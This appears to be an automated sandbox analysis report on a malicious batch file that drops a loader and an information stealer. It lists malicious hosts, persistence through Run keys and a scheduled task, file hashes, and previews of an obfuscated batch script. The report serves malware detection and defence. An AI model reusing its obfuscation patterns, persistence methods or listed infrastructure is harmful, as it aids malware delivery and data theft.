                                                                                                              http://www.pmail.com0x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062232387.000000007ECEA000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.000000002069D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2098429794.00000000218E0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif.4.drfalse
                                                                                                                high
                                                                                                                https://reallyfreegeoip.org/xml/rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  41.185.8.252
                                                                                                                  lwaziacademy.comSouth Africa
                                                                                                                  36943GridhostZAtrue
                                                                                                                  188.114.96.3
                                                                                                                  reallyfreegeoip.orgEuropean Union
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  158.101.44.242
                                                                                                                  checkip.dyndns.comUnited States
                                                                                                                  31898ORACLE-BMC-31898USfalse
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1583899
                                                                                                                  Start date and time:2025-01-03 20:39:08 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 11m 20s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:26
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:PO#5_Tower_049.bat
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winBAT@39/18@5/3
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 97%
                                                                                                                  • Number of executed functions: 253
                                                                                                                  • Number of non-executed functions: 58
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .bat
                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 20.242.39.171, 52.149.20.212, 4.245.163.56
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target Microsofts.exe, PID 6004 because it is empty
                                                                                                                  • Execution Graph export aborted for target Trading_AIBot.exe, PID 2920 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 1600 because it is empty
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  • VT rate limit hit for: PO#5_Tower_049.bat
                                                                                                                  TimeTypeDescription
                                                                                                                  14:39:55API Interceptor2x Sleep call for process: x.exe modified
                                                                                                                  14:40:06API Interceptor19x Sleep call for process: powershell.exe modified
                                                                                                                  14:40:09API Interceptor4x Sleep call for process: Oupzhkpr.PIF modified
                                                                                                                  14:40:49API Interceptor1078x Sleep call for process: apihost.exe modified
                                                                                                                  20:40:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
                                                                                                                  20:40:08Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                  20:40:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
                                                                                                                  20:40:18AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  41.185.8.252PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                    PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        188.114.96.3Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                        • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                                                        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • filetransfer.io/data-package/u7ghXEYp/download
                                                                                                                        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.mffnow.info/1a34/
                                                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.mydreamdeal.click/1ag2/
                                                                                                                        SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.questmatch.pro/ipd6/
                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.rtpwslot888gol.sbs/jmkz/
                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                        158.101.44.242file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Requested Documentation.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        reallyfreegeoip.orgW2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 104.21.67.152
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        checkip.dyndns.comW2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 193.122.6.168
                                                                                                                        lwaziacademy.comPO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        CLOUDFLARENETUShttp://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        Mj6WEKda85.exeGet hashmaliciousDCRatBrowse
                                                                                                                        • 104.21.12.142
                                                                                                                        https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.18.11.207
                                                                                                                        https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44dGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        m.txt.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.212.107
                                                                                                                        https://t.co/jNNzVU90SAGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        nayfObR.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.32.1
                                                                                                                        http://www.klim.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.18.27.193
                                                                                                                        XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 172.67.19.24
                                                                                                                        GridhostZAPO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                        • 41.61.6.129
                                                                                                                        3.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 41.185.108.101
                                                                                                                        2.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 41.61.164.248
                                                                                                                        1.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 41.185.180.246
                                                                                                                        1.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 41.61.153.3
                                                                                                                        2.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 41.185.108.111
                                                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                        • 41.185.133.158
                                                                                                                        3.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 41.61.164.251
                                                                                                                        ORACLE-BMC-31898UStest.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 130.61.86.87
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                        • 140.238.15.187
                                                                                                                        file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 193.122.6.168
                                                                                                                        PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adadguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        nayfObR.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        7z91gvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 41.185.8.252
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        C:\Users\Public\Libraries\rpkhzpuO.pifHSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                            image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                  Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                    RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                      Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8556
                                                                                                                                            Entropy (8bit):4.623706637784657
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                                            MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                                            SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                                            SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                                            SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                            File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):46543
                                                                                                                                            Entropy (8bit):4.705001079878445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                                            MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                                            SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                                            SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                                            SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):679957
                                                                                                                                            Entropy (8bit):7.4483963454083435
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:2H+NXHhlVBcqgRbPaltoM6OwLovLA/eimwQUaq3cF2ez06hNg+Ymnch:2qHX8RbyfovtLovLA/eim/ccF2ez06hO
                                                                                                                                            MD5:25A482D7B6698E7666A523C910799F13
                                                                                                                                            SHA1:18B17A1E14069E747F5076F97A9654D8D99E5ADA
                                                                                                                                            SHA-256:4C1614F48CC1998B7E1F23C15AB0F0E2F4C9356EC05FF413FC5BE98D98EC8ACB
                                                                                                                                            SHA-512:5525D32CB43E6976D8F04EB60281DC7194E8FBC05D39098FD9EBA5E0BDD50C9246A5FA8A88A601940369A97589351F848AD0AB56D6B5B97470FCDBF076572AAE
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:...8...*............................................................................................8...*9.............8...*............................................................................................................................................................................{.."..~.......{..........!.......#...............!.......}................... .(...{.'......|).%.... .........~.........$..|... ..%}.~.....................#|....{...{...........{....('..~.%....~.........}...|...............$...................$.....|{.$.~|.....|.|.......}$..... .|~.. ...'......$."~...#!...#........!..|...~...|.{....~|...... ........}......&.........~{.........&|... ............ ...!.......%...............}.....$..........{....|...........~%.....|...}...#..%.{....&.........(...{.....#!. .......|.....#....{...........................~%.................}}.......{......|...........).....|.|....%"...|........(..FFI.S.J.<.N.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1242624
                                                                                                                                            Entropy (8bit):7.0624316017893145
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:PP+c4OuuuRyxjoSJmjtHXyzvWZS2kCxG2JRxVuYbdxiHA:PmJjW4ZHXyB2kX2Jv/bdx
                                                                                                                                            MD5:EE363121466EE051042410AFFFEA28EF
                                                                                                                                            SHA1:F528897FD071AF01778FB37BC3D6E320012176A8
                                                                                                                                            SHA-256:CD73EEBF2B36EB1BC4DFD5C4D5337AE41E5C49346523CB03202F116DFC838533
                                                                                                                                            SHA-512:5DC645388DE2F6B17207F78BACED71947874B7813C6DAE129F00AB6FC965DB956ABE8025E706F4A68153FEFFC49EDF2459320846C1D508D733C14B6E4A4BA77B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@...............................(...p..................................................................................L............................text...@........................... ..`.itext.............................. ..`.data....)... ...*..................@....bss.....8...P...........................idata...(.......*..................@....tls....4............X...................rdata...............X..............@..@.reloc...............Z..............@..B.rsrc........p......................@..@....................................@..@................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):175800
                                                                                                                                            Entropy (8bit):6.631791793070417
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                            MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                            SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                            SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                            SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: PO_B2W984.com, Detection: malicious, Browse
                                                                                                                                            • Filename: image.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                            • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                                                                                            • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
